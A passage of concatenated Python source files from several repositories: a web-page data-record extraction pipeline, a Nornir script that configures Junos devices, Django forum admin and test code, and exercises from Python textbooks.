level=logging.INFO,
format="%(levelname)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s",
)
SEC = 1000 # in ms
all_metas = fm.PageMeta.get_all()
def download_raw(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.raw_html.exists()
if exists:
logging.info(
"Raw page has already been downloaded. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be downloaded. page_id=%s", page_meta.page_id)
@retrying.retry(
stop_max_attempt_number=10,
wait_exponential_multiplier=SEC,
wait_exponential_max=10 * SEC,
wrap_exception=True,
)
def call_url():
logging.info("Requesting the page... page_id=%s", page_meta.page_id)
response = urllib.request.urlopen(page_meta.url, timeout=10)
page_binary = response.read()
return page_binary
try:
page = call_url()
except retrying.RetryError:
logging.warning(
"Failed download the page, returning. page_id=%s", page_meta.page_id,
)
return
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.raw_html, page)
logging.info("Saving download time in metadata file. page_id=%s", page_meta.page_id)
now = datetime.datetime.now()
page_meta.persist_download_datetime(now)
logging.info("Done. page_id=%s", page_meta.page_id)
def cleanup_html(page_meta: fm.PageMeta, force_override: bool = False) -> None:
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.preprocessed_html.exists()
if exists:
logging.info(
"Page has already been preprocessed. page_id=%s", page_meta.page_id,
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("Raw page will be preprocessed. page_id=%s", page_meta.page_id)
logging.info(
"Opening raw html file by removing stuff. page_id=%s", page_meta.page_id,
)
doc = fm.open_html_document(page_meta.raw_html, remove_stuff=True)
logging.info(
"Stripping <meta>, <script>, and <style> tags. page_id=%s", page_meta.page_id,
)
lxml.etree.strip_elements(doc, "script")
lxml.etree.strip_elements(doc, "style")
lxml.etree.strip_elements(doc, "meta")
logging.info("Writing down the file. page_id=%s", page_meta.page_id)
fm.PageMeta.persist_html(page_meta.preprocessed_html, doc)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_distances(
page_meta: fm.PageMeta, minimum_depth, max_tag_per_gnode, force_override: bool = False
):
logging.info("page_id=%s", page_meta.page_id)
exists = page_meta.distances_pkl.exists()
if exists:
logging.info(
"Distances have already been precomputed, checking parameters... page_id=%s",
page_meta.page_id,
)
precomputed = page_meta.load_precomputed_distances()
precomputed_minimum_depth = precomputed["minimum_depth"]
precomputed_max_tag_per_gnode = precomputed["max_tag_per_gnode"]
precomputed_was_more_restrictive = (
precomputed_max_tag_per_gnode < max_tag_per_gnode
or precomputed_minimum_depth > minimum_depth
)
if force_override:
logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
elif precomputed_was_more_restrictive:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s",
page_meta.page_id,
)
else:
logging.info("Operation skipped. page_id=%s", page_meta.page_id)
return
else:
logging.info("The distances will be computed. page_id=%s", page_meta.page_id)
node_namer, doc = get_named_nodes_html(page_meta)
logging.info("Computing distances. page_id=%s", page_meta.page_id)
distances = {}
core.compute_distances(doc, distances, {}, node_namer, minimum_depth, max_tag_per_gnode)
logging.info("Persisting distances. page_id=%s", page_meta.page_id)
page_meta.persist_precomputed_distances(distances, minimum_depth, max_tag_per_gnode)
logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_data_regions(
page_meta: fm.PageMeta,
threshold: float,
minimum_depth: int,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
exists = page_meta.data_regions_pkl(threshold, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data regions have already been precomputed, checking parameters... page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
precomputed = page_meta.load_precomputed_data_regions(threshold, max_tags_per_gnode)
precomputed_minimum_depth = precomputed["minimum_depth"]
if precomputed_minimum_depth > minimum_depth:
logging.info(
"The previously computed was more restrictive. It'll be overwritten. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
else:
logging.info(
"Operation skipped. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data regions will be computed. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed distances. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
logging.info(
"Starting to compute data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
data_regions = {}
core.find_data_regions(
root, node_namer, minimum_depth, distances, data_regions, threshold, max_tags_per_gnode
)
logging.info(
"Persisting data regions. page_id=%s th=%.2f max_tags=%d",
page_meta.page_id,
threshold,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_regions(
data_regions, threshold, minimum_depth, max_tags_per_gnode
)
logging.info(
"Done. page_id=%s th=%.2f max_tags=%d", page_meta.page_id, threshold, max_tags_per_gnode
)
def precompute_data_records(
page_meta: fm.PageMeta,
thresholds: core.MDREditDistanceThresholds,
max_tags_per_gnode: int,
force_override: bool = False,
):
logging.info("page_id=%s", page_meta.page_id)
assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
assert page_meta.data_regions_pkl(
thresholds.data_region, max_tags_per_gnode
), "Data regions have NOT been precomputed!"
exists = page_meta.data_records_pkl(thresholds, max_tags_per_gnode).exists()
if exists:
logging.info(
"The data records have already been precomputed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
if force_override:
logging.info(
"It will be overwritten. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
else:
# todo(improvement) include min depth checking????
logging.info(
"Operation skipped. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
return
else:
logging.info(
"The data records will be computed. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
node_namer, root = get_named_nodes_html(page_meta)
logging.info(
"Loading precomputed data regions. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
# todo (improvement) check for distances max tags per node
distances = page_meta.load_precomputed_distances()
data_regions = page_meta.load_precomputed_data_regions(
thresholds.data_region, max_tags_per_gnode
)
logging.info(
"Starting to compute data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
data_records = core.find_data_records(
root, data_regions, distances, node_namer, thresholds, max_tags_per_gnode
)
logging.info(
"Persisting data records. page_id=%s th=%s max_tags=%d",
page_meta.page_id,
thresholds,
max_tags_per_gnode,
)
page_meta.persist_precomputed_data_records(data_records, thresholds, max_tags_per_gnode)
logging.info(
"Done. page_id=%s th=%s max_tags=%d", page_meta.page_id, thresholds, max_tags_per_gnode
)
def get_named_nodes_html(page_meta: fm.PageMeta) -> Tuple[core.NodeNamer, lxml.html.HtmlElement]:
if page_meta.named_nodes_html.exists():
logging.info(
"Loading the named nodes html. page_id=%s", page_meta.page_id,
)
root = page_meta.get_named_nodes_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer(for_loaded_file=True)
else:
logging.info(
"Named nodes have NOT been saved, computing it. page_id=%s", page_meta.page_id,
)
assert page_meta.preprocessed_html.exists()
logging.info("Opening preprocessed html. page_id=%s", page_meta.page_id)
root = page_meta.get_preprocessed_html_tree()
logging.info("Loading node namer. page_id=%s", page_meta.page_id)
node_namer = core.NodeNamer()
node_namer.load(root)
logging.info(
"Saving named nodes html. page_id=%s", page_meta.page_id,
)
fm.PageMeta.persist_html(page_meta.named_nodes_html, root)
return node_namer, root
def color_html(page_meta: fm.PageMeta, mdr: core.MDR) -> None:
pass
```
#### File: pymdr/src/utils.py
```python
import os
import pathlib
import pprint
import random
from collections import defaultdict
from typing import List, Optional, Dict
import lxml
import lxml.etree
import lxml.html
import graphviz
import yaml
DOT_NAMING_OPTION_HIERARCHICAL = "hierarchical"
DOT_NAMING_OPTION_SEQUENTIAL = "sequential"
def generate_random_colors(n: int) -> List[str]:
"""
Returns:
list of size `n` with colors in format RGB in HEX: `1A2B3C`
"""
ret = []
r = int(random.random() * 256)
g = int(random.random() * 256)
b = int(random.random() * 256)
step = 256 / n
for i in range(n):
r += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
g += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
b += (0.85 + 0.30 * random.random()) * step + int(random.random() * 256 * 0.2)
r = int(r) % 256
g = int(g) % 256
b = int(b) % 256
ret.append("{:0>2X}{:0>2X}{:0>2X}".format(r, g, b))
return ret
def html_to_dot_sequential_name(
root: lxml.html.HtmlElement, graph_name: str, with_text: bool = False
) -> graphviz.Digraph:
"""
The names of the nodes are defined by `{tag}-{seq - 1}`, where:
tag: the html tag of the node
seq: the sequential order of that tag
ex: if it is the 2nd `table` to be found in the process, it's name will be `table-00001`
ex:
<html>
<div/>
<div>
<div> <span/> <span/> </div>
</div>
</html>
becomes:
html-0 -> div-0
-> div-1 -> div-2 -> span-0
-> span-1
"""
graph = graphviz.Digraph(name=graph_name)
tag_counts = defaultdict(int)
def add_node(html_node: lxml.html.HtmlElement):
tag = html_node.tag
tag_sequential = tag_counts[tag]
tag_counts[tag] += 1
node_name = "{}-{}".format(tag, tag_sequential)
graph.node(node_name, node_name)
if len(html_node) > 0:
for child in html_node.iterchildren():
child_name = add_node(child)
graph.edge(node_name, child_name)
elif with_text:
child_name = "-".join([node_name, "txt"])
graph.node(child_name, html_node.text)
graph.edge(node_name, child_name)
return node_name
add_node(root)
return graph
def html_to_dot_hierarchical_name(
root: lxml.html.HtmlElement, graph_name: str, with_text=False
) -> graphviz.Digraph:
"""
The names of the nodes are defined by `{tag}-{index-path-to-node}`, where:
tag: the html tag of the node
index-path-to-node: the sequential order of indices that should be called from the root to arrive at the node
ex:
<html>
<div/>
<div>
<div> <span/> <span/> </div>
</div>
</html>
becomes:
html-0 -> div-0-0
-> div-0-1 -> div-0-1-0 -> span-0-1-0-0
-> span-0-1-0-1
Args:
root:
graph_name: parameter passed to the graphviz method
with_text: if True, the pure text in the deepest node is also included in the graph as an extra node.
"""
graph = graphviz.Digraph(name=graph_name)
def add_node(
node: lxml.html.HtmlElement, parent_suffix: Optional[str], brotherhood_index: Optional[int],
):
"""Recursive call on this function. Depth-first search through the entire tree."""
tag = node.tag
if parent_suffix is None and brotherhood_index is None:
node_suffix = ""
node_name = tag
else:
node_suffix = (
"-".join([parent_suffix, str(brotherhood_index)])
if parent_suffix
else str(brotherhood_index)
)
node_name = "{}-{}".format(tag, node_suffix)
graph.node(node_name, node_name, path=node_suffix)
if len(node) > 0:
for child_index, child in enumerate(node.iterchildren()):
child_name = add_node(child, node_suffix, child_index)
graph.edge(node_name, child_name)
elif with_text:
child_name = "-".join([node_name, "txt"])
child_path = "-".join([node_suffix, "txt"])
graph.node(child_name, node.text, path=child_path)
graph.edge(node_name, child_name)
return node_name
add_node(root, None, None)
return graph
def html_to_dot(
root, graph_name="html-graph", name_option=DOT_NAMING_OPTION_HIERARCHICAL, with_text=False,
) -> graphviz.Digraph:
"""
Args:
root:
graph_name:
name_option: hierarchical or sequential naming strategy
with_text: include tags without children as a node with the text content of the tag
Returns:
directed graph representation of an html
"""
if name_option == DOT_NAMING_OPTION_SEQUENTIAL:
return html_to_dot_sequential_name(root, graph_name=graph_name, with_text=with_text)
elif name_option == DOT_NAMING_OPTION_HIERARCHICAL:
return html_to_dot_hierarchical_name(root, graph_name=graph_name, with_text=with_text)
else:
raise Exception("No name option `{}`".format(name_option))
class FormatPrinter(pprint.PrettyPrinter):
"""A custom pretty printer specifier for debug purposes."""
def __init__(self, formats: Dict[type, str]):
super(FormatPrinter, self).__init__()
self.formats = formats
def format(self, obj, ctx, max_lvl, lvl):
obj_type = type(obj)
if obj_type in self.formats:
type_format = self.formats[obj_type]
return "{{0:{}}}".format(type_format).format(obj), 1, 0
return pprint.PrettyPrinter.format(self, obj, ctx, max_lvl, lvl)
project_path = pathlib.Path(os.path.realpath(__file__)).parent.parent.absolute()
def get_config_dict() -> dict:
config = project_path.joinpath("config.yml").absolute()
with config.open("r") as f:
config_dict = yaml.load(f, Loader=yaml.FullLoader)
return config_dict
def get_config_outputs_parent_dir() -> pathlib.Path:
config_dict = get_config_dict()
outputs_parent_dir_path = pathlib.Path(config_dict["outputs-parent-dir"])
if outputs_parent_dir_path.is_absolute():
return outputs_parent_dir_path
return project_path.joinpath(outputs_parent_dir_path).absolute()
```
#### File: pymdr/test/test_utils.py
```python
import unittest
from unittest import TestCase
import src.utils as utils
class TestUtils(unittest.TestCase):
def test_generate_random_colors(self):
colors = utils.generate_random_colors(3)
self.assertEquals(len(colors), 3)
self.assertTrue(all(c1 != c2 for c1, c2 in zip(colors[:-1], colors[1:])))
def test_html_to_dot_hierarchical_name(self):
self.fail()
def test_html_to_dot(self):
self.fail()
class Test(TestCase):
def test_html_to_dot_sequential_name(self):
self.fail()
``` |
{
"source": "jpcerezo/junos_automation_with_nornir",
"score": 2
} |
#### File: jpcerezo/junos_automation_with_nornir/configure_the_network.py
```python
from nornir import InitNornir
from nornir.plugins.tasks import networking, text
from nornir.plugins.functions.text import print_title, print_result
from nornir.core.filter import F
def configuration(task):
r = task.run(task=text.template_file, name="Generate configuration", template="config.j2", path=f"templates/{task.host.platform}")
task.host["config"] = r.result
task.run(task=networking.napalm_configure, name="Loading configuration on the device", replace=False, configuration=task.host["config"])
nr = InitNornir(config_file="config.yaml", dry_run=False)
Junos_devices = nr.filter(F(platform="junos"))
print_title("Playbook to configure the network")
result = Junos_devices.run(task=configuration)
print_result(result)
'''
# to check if a task failed:
result.failed
'''
'''
# to check if the device vMX1 configuration changed
result["vMX1"].changed
result["vMX1"][2]
result["vMX1"][2].changed
result["vMX1"][2].diff
'''
'''
# the check which devices had a configuration changed
for item in Junos_devices.inventory.hosts:
dev=nr.inventory.hosts[item]
print ('**** ' + item + ' ****')
result[item][2].changed
'''
``` |
{
"source": "jpch89/advanced-python",
"score": 4
} |
#### File: advanced-python/chapter04/class_var.py
```python
class A:
aa = 1
def __init__(self, x, y):
self.x = x
self.y = y
a = A(2, 3)
A.aa = 11
a.aa = 100 # 在对象上新建变量 aa
print(a.x, a.y, a.aa)
print(A.aa)
"""
2 3 100
11
"""
print()
b = A(3, 5)
print(b.aa) # 类变量被所有实例共享
"""
11
"""
```
#### File: advanced-python/chapter11/python_thread.py
```python
import time
import threading
# 1. 通过 Thread 类实例化
"""
def get_detail_html(url):
print('get detail html started')
time.sleep(2)
print('get detail html end')
def get_detail_url(url):
print('get detail url started')
time.sleep(4)
print('get detail url end')
if __name__ == '__main__':
thread1 = threading.Thread(target=get_detail_html, args=('', ))
thread2 = threading.Thread(target=get_detail_url, args=('', ))
thread2.setDaemon(True)
start_time = time.time()
thread1.start()
thread2.start()
print('time elapsed: {}'.format(time.time() - start_time))
"""
"""
get detail html started
get detail url started
time elapsed: 0.0
get detail html end
"""
# 2. 通过继承 Thread 类来实现多线程
# 重写 run 方法
class GetDetailHTML(threading.Thread):
def __init__(self, name):
super().__init__(name=name)
def run(self): # 这里放的就是 target 指向的东西
print('get detail url started')
time.sleep(2)
print('get detail url end')
class GetDetailURL(threading.Thread):
def __init__(self, name):
super().__init__(name=name)
def run(self): # 这里放的就是 target 指向的东西
print('get detail url started')
time.sleep(4)
print('get detail url end')
if __name__ == '__main__':
thread1 = GetDetailHTML('get_detail_html')
thread2 = GetDetailURL('get_detail_url')
start_time = time.time()
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('time elapsed: {}'.format(time.time() - start_time))
"""
get detail url started
get detail url started
get detail url end
get detail url end
time elapsed: 4.001728534698486
"""
``` |
{
"source": "jpch89/bbs_python37",
"score": 2
} |
#### File: my_bbs/post/admin.py
```python
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from post.models import Comment, Topic
@admin.register(Topic)
class TopicAdmin(admin.ModelAdmin):
class TitleFilter(admin.SimpleListFilter):
title = _('标题过滤')
parameter_name = 'tf'
def lookups(self, request, model_admin):
return (
('first', _('包含first')),
('!first', _('不包含first')),
)
def queryset(self, request, queryset):
if self.value() == 'first':
return queryset.filter(title__contains=self.value())
elif self.value() == '!first':
return queryset.exclude(title__contains=self.value()[1:])
else:
return queryset
def get_ordering(self, request):
if request.user.is_superuser:
return ['id']
else:
return self.ordering
"""
def get_queryset(self, request):
return self.model._default_manager.filter(title__contains='third')
"""
# list_display = ('title', 'content', 'is_online', 'user', 'created_time')
# search_fields = ['title', 'user__username']
search_fields = ['title', '=user__username']
list_display = ('title', 'topic_content', 'topic_is_online', 'user')
# list_filter = ['title', 'user__username']
list_filter = [TitleFilter, 'user__username']
ordering = ['id']
list_per_page = 1
list_max_show_all = 2
# fields = ['user', 'title', 'is_online']
# exclude = ['content']
"""
fields = [
('user', 'title'),
'content',
'is_online'
]
"""
"""
fieldsets = (
('Topic Part A', {
'fields': ('title', 'user'),
'description': 'Topic的title和user',
}),
('Topic Part B', {
'fields': ('content', 'is_online'),
'classes': ['collapse', 'wide'],
'description': 'Topic的content的is_online'
})
)
"""
"""
fields = [('user', 'title'), 'is_online', 'content_length']
readonly_fields = ('user', 'content', 'content_length')
"""
# raw_id_fields = ('user', )
def content_length(self, obj):
return len(obj.content)
content_length.short_description = u'话题长度内容'
def topic_is_online(self, obj):
return u'是' if obj.is_online else u'否'
topic_is_online.short_description = u'话题是否在线'
def topic_content(self, obj):
return obj.content[:30]
topic_content.short_description = u'话题内容'
actions = ['topic_online', 'topic_offline']
def topic_online(self, request, queryset):
rows_updated = queryset.update(is_online=True)
self.message_user(request, '%s topics online' % rows_updated)
topic_online.short_description = u'上线所选的 %s' % Topic._meta.verbose_name
def topic_offline(self, request, queryset):
rows_updated = queryset.udpate(is_online=False)
self.message_user(request, '%s topics offline' % rows_updated)
topic_offline.short_description = u'下线所选的 %s' % Topic._meta.verbose_name
def save_model(self, request, obj, form, change):
if change and 'is_online' in form.changed_data and not obj.is_online:
self.message_user(request, 'Topic(%s)被管理员删除了' % obj.id)
obj.title = '%s(%s)' % (obj.title, '管理员删除')
super(TopicAdmin, self).save_model(request, obj, form, change)
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
pass
```
#### File: post/templatetags/custom_tags.py
```python
from django import template
register = template.Library()
@register.simple_tag
def prefix_tag(cur_str):
return 'Hello %s' % cur_str
@register.simple_tag(takes_context=True)
def prefix_tag(contex, cur_str):
return '%s %s' % (context['prefix'], cur_str)
@register.simple_tag(takes_context=True, name='prefix')
def prefix_tag(contex, cur_str):
return '%s %s' % (context['prefix'], cur_str)
@register.inclusion_tag('post/inclusion.html', takes_context=True)
def hello_inclusion_tag(context, cur_str):
return {'hello': '%s %s' % (context['prefix'], cur_str)}
@register.simple_tag
def hello_assignment_tag(cur_str):
return 'Hello: %s' % cur_str
@register.filter
def replace_django(value):
return value.replace('django', 'Django')
@register.filter(name='r_django')
def replace_django(value, base):
return value.replace('django', base)
```
#### File: my_bbs/post/tests.py
```python
import unittest
from django.contrib.auth.models import User
from django.test import TestCase
from post.models import Topic
"""
class SimpleTest(TestCase):
def test_addition(self):
def addition(x, y):
return x + y
self.assertEqual(addition(1, 1), 2)
def test_post_topic_model(self):
user = User.objects.create_user(username='username', password='password')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=user
)
self.assertTrue(topic is not None)
self.assertEqual(Topic.objects.count(), 1)
topic.delete()
self.assertEqual(Topic.objects.count(), 0)
def test_topic_detail_view(self):
user = User.objects.create_user(username='username', password='password')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=user
)
response = self.client.get('/post/topic/%d/' % topic.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['id'], topic.id)
"""
"""
class SimpleTest(TestCase):
@classmethod
def setUpClass(cls):
print('running setUpClass')
@classmethod
def tearDownClass(cls):
print('running tearDownClass')
# 团子注:这里其实跟 python 一般的命名方式不太一样,setUp 应为 set_up
def setUp(self):
print('running setUp')
self.user = User.objects.create_user(username='username', password='password')
def test_post_topic_model(self):
print('running test_post_topic_model')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=self.user
)
self.assertTrue(topic is not None)
self.assertEqual(Topic.objects.count(), 1)
topic.delete()
self.assertEqual(Topic.objects.count(), 0)
def test_topic_detail_view(self):
print('running test_topic_detail_view')
topic = Topic.objects.create(
title='test topic', content='first test topic', user=self.user
)
response = self.client.get('/post/topic/%d/' % topic.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['id'], topic.id)
def tearDown(self):
print('running tearDown')
"""
class SimpleTest(TestCase):
@unittest.skip('skip test a')
def test_a(self):
print('running test a')
@unittest.skipIf(2 > 1, 'skip test b')
def test_b(self):
print('running test b')
@unittest.skipUnless(2 < 1, 'skip test c')
def test_c(self):
print('running test c')
``` |
{
"source": "jpch89/effectivepython",
"score": 3
} |
#### File: jpch89/effectivepython/ep004_helper.py
```python
from urllib.parse import parse_qs
# 解析查询字符串 query string
my_values = parse_qs('red=5&blue=0&green=',
keep_blank_values=True)
# print(repr(my_values)) # 原书写法
print(my_values) # 返回的是字典,直接这样写就行了
# >>>
# {'red': ['5'], 'blue': ['0'], 'green': ['']}
# 查询字符串中的参数可能有:多个值和空白 blank 值。
# 有些参数则没有出现。
# 使用 get 方法可以不报错的从字典中取值。
print('Red: ', my_values.get('red'))
print('Green: ', my_values.get('green'))
print('Opacity: ', my_values.get('opacity'))
print('-' * 50)
# 需求:当查询的参数没有出现在查询字符串中
# 或者参数的值为空白的时候
# 可以返回 0
# 思路:空值和零值都是 False
red = my_values.get('red', [''])[0] or 0
green = my_values.get('green', [''])[0] or 0
opacity = my_values.get('opacity', [''])[0] or 0
print('Red: %r' % red)
print('Green: %r' % green)
print('Opacity: %r' % opacity)
print('-' * 50)
# 需求:最后要用到的是整数类型
# 思路:类型转换
red = int(my_values.get('red', [''])[0] or 0)
# 这种长表达式的写法看上去很乱!
# 改进1:使用 Python 2.5 添加的三元表达式
red = my_values.get('red', [''])
red = int(red[0]) if red[0] else 0
# 改进2:使用跨行的 if/else 语句
green = my_values.get('green', [''])
if green[0]:
green = int(green[0])
else:
green = 0
# 改进3:频繁使用的逻辑,需要封装成辅助函数
def get_first_value(values, key, default=0):
found = values.get(key, [''])
if found[0]:
found = int(found[0])
else:
found = default
return found
```
#### File: jpch89/effectivepython/ep012_forwhilenoelse.py
```python
for i in range(3):
print('循环 %d' % i)
else:
print('else 块!')
"""
循环 0
循环 1
循环 2
else 块!
"""
# 中断循环则不会执行 else 块
for i in range(3):
print('循环 %d' % i)
if i == 1:
break
else:
print('else 块!')
"""
循环 0
循环 1
"""
# 如果被遍历的对象是空的,会立即执行 else 块
for x in []:
print('永远不会执行!')
else:
print('我是 else 块!')
"""
我是 else 块!
"""
# 循环初始条件为 False,也会立即执行 else 块
while False:
print('永远不会执行!')
else:
print('我是 else 块!')
"""
我是 else 块!
"""
# 判断两个数是否互质 coprime
# 即除了 1 以外,没有其他公约数
a = 4
b = 9
for i in range(2, min(a, b) + 1):
print('尝试', i)
if a % i == 0 and b % i == 0:
print('不互质!')
break
else:
print('互质!')
"""
互质!
"""
# 使用辅助函数判断是否互质(写法1)
def coprime(a, b):
for i in range(2, min(a, b) + 1):
if a % i == 0 and b % i == 0:
return False
return True
# 使用辅助函数判断是否互质(写法2)
def coprime2(a, b):
is_coprime = True
for i in range(2, min(a, b) + 1):
if a % i == 0 and b % i == 0:
is_coprime = False
break
return is_coprime
```
#### File: jpch89/effectivepython/ep015_nonlocal.py
```python
def sort_priority(values, group):
def helper(x):
if x in group:
return (0, x)
return (1, x)
values.sort(key=helper)
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
sort_priority(numbers, group)
print(numbers)
"""
[2, 3, 5, 7, 1, 4, 6, 8]
"""
# 新需求:判断 numbers 的数字是否出现在了 group 里面
def sort_priority2(numbers, group):
found = False
def helper(x):
if x in group:
found = True # 看起来很简单
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
found = sort_priority2(numbers, group)
print('Found:', found)
print(numbers)
# 明明找到了,但是却显示没有找到!
"""
Found: False
[2, 3, 5, 7, 1, 4, 6, 8]
"""
def sort_priority2(numbers, group):
found = False # Scope: 'sort_priority2'
def helper(x):
if x in group:
found = True # Scope: 'helper' -- Bad!
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
def sort_priority3(numbers, group):
found = False
def helper(x):
nonlocal found
if x in group:
found = True
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
found = sort_priority3(numbers, group)
print('Found:', found)
print(numbers)
"""
Found: True
[2, 3, 5, 7, 1, 4, 6, 8]
"""
print('-' * 30)
class Sorter(object):
def __init__(self, group):
self.group = group
self.found = False
def __call__(self, x):
if x in self.group:
self.found = True
return (0, x)
return (1, x)
sorter = Sorter(group)
numbers.sort(key=sorter)
print(numbers)
assert sorter.found is True
"""
------------------------------
[2, 3, 5, 7, 1, 4, 6, 8]
"""
# Python 2
def sort_priority(numbers, group):
found = [False]
def helper(x):
if x in group:
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found[0]
``` |
{
"source": "jpch89/fluentpython",
"score": 4
} |
#### File: fluentpython/Chapter1/ex1_1_cards.py
```python
import collections
Card = collections.namedtuple('Card', ['rank', 'suit'])
# 也可以用字符串隔开字段
# Card = collections.namedtuple('Card', 'rank suit')
class FrenchDeck:
ranks = [str(n) for n in range(2, 11)] + list('JQKA')
suits = 'spades diamonds clubs hearts'.split()
def __init__(self):
self._cards = [Card(rank, suit) for suit in self.suits
for rank in self.ranks]
def __len__(self):
return len(self._cards)
def __getitem__(self, position):
return self._cards[position]
beer_card = Card('7', 'diamonds')
print(beer_card)
# Card(rank='7', suit='diamonds')
deck = FrenchDeck()
print(len(deck))
# 52
print(deck[0])
print(deck[-1])
from random import choice
print(choice(deck))
print(choice(deck))
print(choice(deck))
``` |
{
"source": "jpch89/learningpython",
"score": 4
} |
#### File: learningpython/C20/myzip.py
```python
def myzip(*args):
iters = list(map(iter, args))
while iters:
res = [next(i) for i in iters]
yield tuple(res)
print(list(myzip()))
"""
[('a', 'l'), ('b', 'm'), ('c', 'n')]
"""
```
#### File: learningpython/C32/scope.py
```python
def generate():
class Spam:
count = 1
def method(self):
print(count)
return Spam()
generate().method()
```
#### File: learningpython/C38/catcher.py
```python
class Wrapper:
def __init__(self, obj):
self.wrapped = obj
def __getattr__(self, attrname):
print('Trace: ' + attrname)
return getattr(self.wrapped, attrname)
x = Wrapper([1, 2, 3])
x.append(4)
print(x.wrapped)
"""
Trace: append
[1, 2, 3, 4]
"""
```
#### File: learningpython/C38/getattr-delegate.py
```python
class Person:
def __init__(self, name, job=None, pay=0):
self.name = name
self.job = job
self.pay = pay
def lastName(self):
return self.name.split()[-1]
def giveRaise(self, percent):
self.pay = int(self.pay * (1 + percent))
def __repr__(self):
return '[Person: %s, %s]' % (self.name, self.pay)
class Manager(Person):
def __init__(self, name, pay):
self.person = Person(name, 'mgr', pay)
def giveRaise(self, percent, bonus=.10):
self.person.giveRaise(percent + bonus)
# def __getattr__(self, attr):
# return getattr(self.person, attr)
def __getattribute__(self, attr):
print('**', attr)
if attr in ['person', 'giveRaise']:
return object.__getattribute__(self, attr)
else:
return getattr(self.person, attr)
# def __repr__(self):
# return str(self.person)
if __name__ == '__main__':
sue = Person('<NAME>', job='dev', pay=100000)
print(sue.lastName())
sue.giveRaise(.10)
print(sue)
tom = Manager('<NAME>', 50000)
print(tom.lastName())
tom.giveRaise(.10)
print(tom)
```
#### File: learningpython/C38/validate_descriptors1.py
```python
class CardHolder(object):
acctlen = 8
retireage = 59.5
def __init__(self, acct, name, age, addr):
self.acct = acct
self.name = name
self.age = age
self.addr = addr
class Name(object):
def __get__(self, instance, owner):
return self.name
def __set__(self, instance, value):
value = value.lower().replace(' ', '_')
self.name = value
name = Name()
class Age(object):
def __get__(self, instance, owner):
return self.age
def __set__(self, instance, value):
if value < 0 or value > 150:
raise ValueError('invalid age')
else:
self.age = value
age = Age()
class Acct(object):
def __get__(self, instance, owner):
return self.acct[:-3] + '***'
def __set__(self, instance, value):
value = value.replace('-', '')
if len(value) != instance.acctlen:
raise TypeError('invalid acct number')
else:
self.acct = value
acct = Acct()
class Remain(object):
def __get__(self, instance, owner):
return instance.retireage - instance.age
def __set__(self, instance, value):
raise TypeError('cannot set remain')
remain = Remain()
```
#### File: learningpython/C39/access1.py
```python
traceMe = False
def trace(*args):
if traceMe:
print('[' + ' '.join(map(str, args)) + ']')
# Private 实际上是个带参装饰器,所以有三层
# 1. Private 函数,返回一个装饰器
# 2. onDecorator 函数,返回一个类
# 3. onInstance 类,被装饰的类实例化的时候实际上运行的就是它
# privates 是一个元组,里面放着所有私有属性
